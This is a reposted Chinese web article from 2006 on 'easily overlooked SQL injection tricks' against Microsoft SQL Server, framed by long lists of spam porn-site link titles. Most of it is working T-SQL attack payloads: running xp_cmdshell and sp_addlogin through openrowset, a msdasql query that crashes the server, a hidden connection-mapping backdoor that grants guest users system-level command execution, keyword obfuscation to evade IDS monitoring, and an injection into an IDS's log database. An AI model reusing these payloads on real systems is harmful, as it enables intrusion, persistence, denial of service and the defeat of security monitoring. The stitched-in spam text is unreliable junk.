国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

請注意那些容易被忽略的SQL注入技巧
2006-12-29   

 1.關于Openrowset和Opendatasource

可能這個技巧早有人已經會了,就是利用openrowset發送本地命令。通常我們的用法是(包括MSDN的列子)如下:

select * from openrowset('sqloledb','myserver';'sa';'','select * from
 table')

可見(即使從字面意義上看)openrowset只是作為一個快捷的遠程數據庫訪問,它必須跟在select后面,也就是說需要返回一個recordset 。

那么我們能不能利用它調用xp_cmdshell呢?答案是肯定的!

select * from openrowset('sqloledb','server';'sa';'','set fmtonly off
 exec master.dbo.xp_cmdshel l ''dir c:\''')

必須加上set fmtonly off用來屏蔽默認的只返回列信息的設置,這樣xp_cmdshell返回的output集合就會提交給前面的select顯示,如果采用默認設置,會返回空集合導致select出錯,命令也就無法執行了。

那么如果我們要調用sp_addlogin呢,他不會像xp_cmdshell返回任何集合的,我們就不能再依靠fmtonly設置了,可以如下操作

select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' 
exec master.dbo.sp_addlogin Hectic')

這樣,命令至少會返回select OK!'的集合,你的機器商會顯示OK!,同時對方的數據庫內也會增加一個Hectic的賬號,也就是說,我們利用

select 'OK!'的返回集合欺騙了本地的select請求,是命令能夠正常執行,通理sp_addsrvrolemember和opendatasource也可以如此操作!至于這個方法真正的用處,大家慢慢想吧。

2.關于Msdasql兩次請求的問題

不知道大家有沒有試過用msdasql連接遠程數據庫,當然這個api必須是sqlserver的管理員才可以調用,那么如下:

select * from openrowset('msdasql','driver={sql 
server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','s
elect * from table1 select * from table2')

當table1和table2的字段數目不相同時,你會發現對方的sqlserver崩潰了,連本地連接都會失敗,而系統資源占用一切正常,用pskill殺死 sqlserver進程后,如果不重啟機器,sqlserver要么無法正常啟動,要么時常出現非法操作,我也只是碰巧找到這個bug的,具體原因我還沒有摸透,而且很奇怪的是這個現象只出現在msdasql上,sqloledb就沒有這個問題,看來問題不是在于請求集合數目和返回集合數目不匹配上,應該還是msdasql本身的問題,具體原因,大家一起慢慢研究吧。

3.可怕的后門

以前在網上看到有人說在 sqlserver上留后門可以通過添加triger、jobs或改寫sp_addlogin和sp_addsrvrolemember做到,這些方法當然可行,但是很容易會被發現。不知道大家有沒有想過sqloledb的本地連接映射。呵呵,比如你在對方的sqlserver上用sqlserver的管理員賬號執行如下的命令:

select * from openrowset('sqloledb','trusted_connection=yes;data 
source=Hectic','set fmtonly off exec master..xp_cmdshell ''dir c:\''')

這樣在對方的 sqlserver上建立了一個名為Hectic的本地連接映射,只要sqlserver不重啟,這個映射會一直存在下去,至少我現在還不知道如何發現別人放置的連接映射,好了,以上的命令運行過后,你會發現哪怕是sqlserver沒有任何權限的guest用戶,運行以上這條命令也一樣能通過!而且權限是 localsystem?。J安裝)呵呵!這個方法可以用來在以被入侵過獲得管理員權限的sqlserver上留下一個后門了。以上的方法在 sqlserver2000 sqlserver2000SP1上通過!

另外還有一個猜測,不知道大家有沒有注意過windows默認附帶的兩個dsn,一個是localserver一個是msqi,這兩個在建立的時候是本地管理員賬號連接sqlserver的,如果對方的 sqlserver是通過自定義的power user啟動,那么sa的權限就和power user一樣,很難有所大作為,但是我們通過如下的命令:

select * from openrowset
('msdasql','dsn=locaserver;trusted_connection=yes','set fmtonly off exec 
master..xp_cmdshell ''dir c:\''')

應該可以利用localserver的管理員賬號連接本地sqlserver然后再以這個賬號的權限執行本地命令了,這是后我想應該能突破sa那個power user權限了?,F在的問題是sqloledb無法調用dsn連接,而msdasql非管理員不讓調用,所以我現在正在尋找guest調用msdasql 的方法。

如果有人知道這個bug如何突破,或有新的想法,我們可以一起討論一下,這個發放如果能成功被guest利用,將會是一個很嚴重的安全漏洞。因為我們前面提到的任何sql語句都可以提交給對方的asp去幫我們執行。

4.利用T-sql騙過Ids或攻擊Ids

現在的ids已經變得越來越聰明了。有的ids加入了xp_cmdshell sp_addlogin 的監視,但是畢竟人工智能沒有出現的今天,這種監視總是有種騙人的感覺。

先說說欺騙Ids

ids既然監視xp_cmdshell關鍵字,那么我們可以這么做:

declare @a sysname set @a="xp_" "cmdshell" exec @a 'dir c:\'

這個代碼相信大家都能看明白,還有xp_cmdshell作為一個store procedure在master庫內有一個id號,固定的,我們也可以這么做:
假設這個id=988456

declare @a sysname select @a=name from sysobjects where id=988456 
exec @a 'dir c:\'

當然也可以:

declare @a sysname select @a=name from sysobjects where id=988455 1 
exec @a 'dir c:\'

這種做法排列組合,ids根本不可能做的到完全監視。同理,sp_addlogin也可以這么做。

再說說攻擊Ids

因為ids數據量很大,日至通常備份到常規數據庫,比如sql server。

如果用古老的recordset.addnew做法,會嚴重影響ids的性能,因為通過ado做t-sql請求,不但效率高,而且有一部分工作可以交給sql server 去做,通常程序會這么寫:

insert table values ('日至內容',...)

那么我們想想看,如果用 temp') exec xp_cmdshell 'dir c:\' -- 提交后會變成:

insert table values ('日至內容'....'temp') exec xp_cmdshell 'dir 
c:\' -- ')

這樣,xp_cmdshell就可以在ids的數據庫運行了。當然ids是一個嗅嘆器,他會抓所有的報,而瀏覽器提交的時候會把空格變成 。因此, 會被提交到sql server,這樣你的命令就無法執行了。 唯一的辦法就是:

insert/**/table/**/values('日至內容'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ')

用/**/代替空格做間隔符,這樣你的t-sql才能在ids的數據庫內執行。當然也可以用其他語句,可以破壞,備份ids的數據庫到你的共享目錄,呵呵。

其實這種方法的原理和攻擊asp是一樣的,只是把空格變成了/**/ 。本來asp是select語句,那么用'就可以屏蔽?,F在ids用insert語句,那么用')屏蔽。

好了,其他很多新的入侵語句大家可以自己慢慢想,最好的測試工具就是query analyzer了。

責任編輯 趙毅 zhaoyi#51cto.com TEL:(010)68476636-8001


熱詞搜索:

上一篇:利用系統漏洞輕輕松松繞過你的驗證碼
下一篇:手機“病毒”分析

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
精品国产一区二区三区av性色| 欧美日韩国产不卡| 欧美视频一区在线观看| 日韩一区二区电影网| 亚洲色图视频网| 国内外成人在线| 欧美剧在线免费观看网站| 国产精品你懂的| 极品美女销魂一区二区三区免费| 色综合视频在线观看| 久久精品综合网| 久久er精品视频| 91精品国产综合久久精品app| 中文字幕一区二区三| 国产主播一区二区| 欧美电视剧免费观看| 日本美女一区二区三区| 91成人国产精品| 自拍偷在线精品自拍偷无码专区| 国产一区二区在线影院| 日韩精品影音先锋| 麻豆一区二区三| 日韩欧美中文字幕制服| 日韩电影网1区2区| 91精品国产aⅴ一区二区| 亚洲午夜久久久久中文字幕久| 99久久精品情趣| 最新日韩在线视频| www.性欧美| 中文字幕佐山爱一区二区免费| 成人国产精品免费观看视频| 国产女人18水真多18精品一级做| 国产一区二区精品久久91| 日韩视频永久免费| 精品亚洲aⅴ乱码一区二区三区| 在线播放一区二区三区| 日本一区中文字幕| 日韩精品一区二区三区四区| 六月丁香综合在线视频| 精品一区二区免费视频| 免费观看久久久4p| 制服丝袜亚洲网站| 国产一区二区三区| 久久伊人蜜桃av一区二区| 精品一区二区三区欧美| 久久久久久一二三区| 国产不卡一区视频| 亚洲欧洲精品天堂一级| 在线观看一区日韩| 天天操天天干天天综合网| 欧美男生操女生| 国内不卡的二区三区中文字幕| 久久久.com| 色素色在线综合| 肉肉av福利一精品导航| 精品久久久久久久久久久久久久久| 国产毛片一区二区| 亚洲男女一区二区三区| 欧美丰满高潮xxxx喷水动漫| 国产呦萝稀缺另类资源| 国产精品国产a级| 欧美麻豆精品久久久久久| 久久国产精品72免费观看| 久久免费国产精品| 99久久精品免费看国产| 日韩电影一区二区三区| 中文在线一区二区| 6080午夜不卡| www.性欧美| 美女脱光内衣内裤视频久久网站| 欧美国产禁国产网站cc| 欧美日韩精品一区二区三区 | 91小视频在线免费看| 亚洲影院久久精品| 国产视频一区二区三区在线观看| 91污片在线观看| 激情五月婷婷综合网| 亚洲成人免费电影| 国产精品久久久久精k8| 日韩精品一区二区三区四区视频| 91浏览器打开| 国产精品资源站在线| 国产盗摄女厕一区二区三区| 亚洲精品视频在线观看网站| 欧美成人午夜电影| 欧美日韩高清不卡| av电影天堂一区二区在线观看| 秋霞影院一区二区| 亚洲成在人线免费| 亚洲一二三级电影| 国产精品美日韩| 2019国产精品| 日韩一级成人av| 欧美专区日韩专区| 一本色道久久综合狠狠躁的推荐| 国产一区二区三区精品欧美日韩一区二区三区 | 色av成人天堂桃色av| 国产精品99久久久久久有的能看| 午夜电影网一区| 亚洲一级在线观看| 亚洲欧美偷拍另类a∨色屁股| 国产午夜亚洲精品理论片色戒| 日韩欧美在线影院| 欧美精品三级在线观看| 在线亚洲一区二区| 色综合久久中文综合久久97| 成人精品国产免费网站| 国产二区国产一区在线观看| 韩日欧美一区二区三区| 国内精品第一页| 韩国欧美一区二区| 国产一区二区三区四区在线观看| 极品美女销魂一区二区三区免费| 久久精品99国产精品| 久久99国产精品久久| 毛片不卡一区二区| 国产在线精品一区在线观看麻豆| 久久国产精品色| 国产福利一区二区三区视频| 国产在线播放一区三区四| 极品少妇xxxx精品少妇偷拍| 国产福利一区在线| 9i在线看片成人免费| 一本久久精品一区二区| 欧美午夜电影一区| 91精品国产一区二区三区香蕉| 7777精品伊人久久久大香线蕉完整版| 欧美日韩免费高清一区色橹橹| 欧美日韩一级视频| 日韩精品中文字幕一区二区三区| 久久综合视频网| 国产精品不卡视频| 亚洲午夜羞羞片| 激情文学综合网| 不卡电影免费在线播放一区| 欧美午夜片在线观看| 日韩午夜在线影院| 亚洲靠逼com| 日韩av中文字幕一区二区三区| 精彩视频一区二区| 99久久免费视频.com| 欧美日韩日日夜夜| 久久精品视频免费| 曰韩精品一区二区| 激情综合五月婷婷| 在线观看日产精品| 精品国产免费一区二区三区香蕉| 国产精品免费视频网站| 亚洲国产视频一区二区| 国产原创一区二区三区| 在线免费一区三区| 精品处破学生在线二十三| 亚洲欧洲av另类| 理论电影国产精品| 色婷婷av一区二区三区之一色屋| 欧美二区三区的天堂| 国产精品美女久久久久aⅴ国产馆 国产精品美女久久久久av爽李琼 国产精品美女久久久久高潮 | 亚洲综合网站在线观看| 久久国产成人午夜av影院| 色综合色狠狠综合色| 欧美电影免费观看高清完整版在| 中文字幕在线免费不卡| 激情久久五月天| 欧美视频在线不卡| 中文字幕日韩av资源站| 久久精品久久综合| 欧美丝袜丝nylons| 综合自拍亚洲综合图不卡区| 免费久久精品视频| 欧美三级蜜桃2在线观看| 欧美激情一区二区在线| 免费成人在线网站| 欧美色窝79yyyycom| 国产精品入口麻豆原神| 蜜桃传媒麻豆第一区在线观看| 在线观看网站黄不卡| 最好看的中文字幕久久| 国产成人在线视频网站| 精品剧情v国产在线观看在线| 亚洲国产毛片aaaaa无费看| 91免费在线视频观看| 日本一区二区三区dvd视频在线| 美女脱光内衣内裤视频久久网站| 欧美日韩国产在线播放网站| 日韩久久一区二区| 国产.欧美.日韩| 久久久国产午夜精品| 紧缚奴在线一区二区三区| 91精品欧美一区二区三区综合在| 一区二区三区免费| 91丝袜呻吟高潮美腿白嫩在线观看| 亚洲欧美精品午睡沙发| 成人黄色a**站在线观看| 国产欧美一区二区精品忘忧草| 久久精品久久久精品美女| 精品日韩成人av| 国产一区啦啦啦在线观看| 精品奇米国产一区二区三区| 激情欧美一区二区三区在线观看| 日韩精品最新网址|